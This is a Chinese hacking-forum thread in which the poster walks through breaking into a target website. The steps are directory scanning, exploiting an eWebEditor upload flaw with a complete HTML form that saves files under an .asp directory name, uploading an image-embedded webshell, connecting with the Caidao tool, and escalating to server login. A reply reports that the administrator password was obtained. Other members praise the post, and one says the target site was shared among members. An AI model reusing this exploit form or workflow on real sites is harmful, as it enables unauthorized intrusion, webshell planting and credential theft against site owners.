查看: 12371|回复: 5

好吧 年前最后一站

[复制链接]
  • TA的每日心情

    2015-10-1 22:33
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2013-2-7 02:28:59 | 显示全部楼层 |阅读模式
    q.jpg
    目标站
    扫目录扫出了一个
    qe.jpg
    然后百度了一下 ewebeditor漏洞
    利用以下代码 保存为1.html
    <FORM encType=multipart/form-data method=post name=myform action=http://www.xxxx.cn/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp>
    <Input style="WIDTH: 510px; HEIGHT: 18px" size=85 type=file name=uploadfile>
    <Input value=upload type=submit> <BR></FORM
    打开
    1.html
    1234.jpg
    上传一个图片合成马或是免杀小马(不然会出现乱码)

    成功后看源文件
    123.jpg
    得到路径
    http://www.xxxx.cn/uploadfile/Mr.DzY.asp/20130207021537820.jpg
    菜刀连接
    123.jpg
    传大马就不用说了   用ASPX马探测IIS   
       134.jpg
    然后登陆服务器
    123.jpg
    结束      过年了  大家好好过年 多陪陪家人   明年我们继续

    评分

    参与人数 3i币 +14 收起 理由
    made + 6 支持原创
    名哲 + 4 支持原创
    Free_小东 + 4 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2015-10-1 22:33
  • 签到天数: 2 天

    [LV.1]初来乍到

     楼主| 发表于 2013-2-7 02:31:25 | 显示全部楼层
    传错图了
    124.jpg
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-2-7 15:27:45 | 显示全部楼层
    ...这个网站是我发出去的啊   你是孤风? 还是他发给别人了

    点评

    别人给的站。  发表于 2013-2-7 18:35
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-6-1 14:33
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2013-2-7 18:07:49 | 显示全部楼层
    楼上的亮点啦。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-9-21 13:55
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2013-2-8 23:06:41 | 显示全部楼层
    擦= = 传大马就不用说了   用ASPX马探测IIS     怎么就没了...

    点评

    直接探测出administrator的密码来了  详情 回复 发表于 2013-2-8 23:12
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-1 22:33
  • 签到天数: 2 天

    [LV.1]初来乍到

     楼主| 发表于 2013-2-8 23:12:33 | 显示全部楼层
    冰刀 发表于 2013-2-8 23:06
    擦= = 传大马就不用说了   用ASPX马探测IIS     怎么就没了...

    直接探测出administrator的密码来了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 04:06 , Processed in 0.021364 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部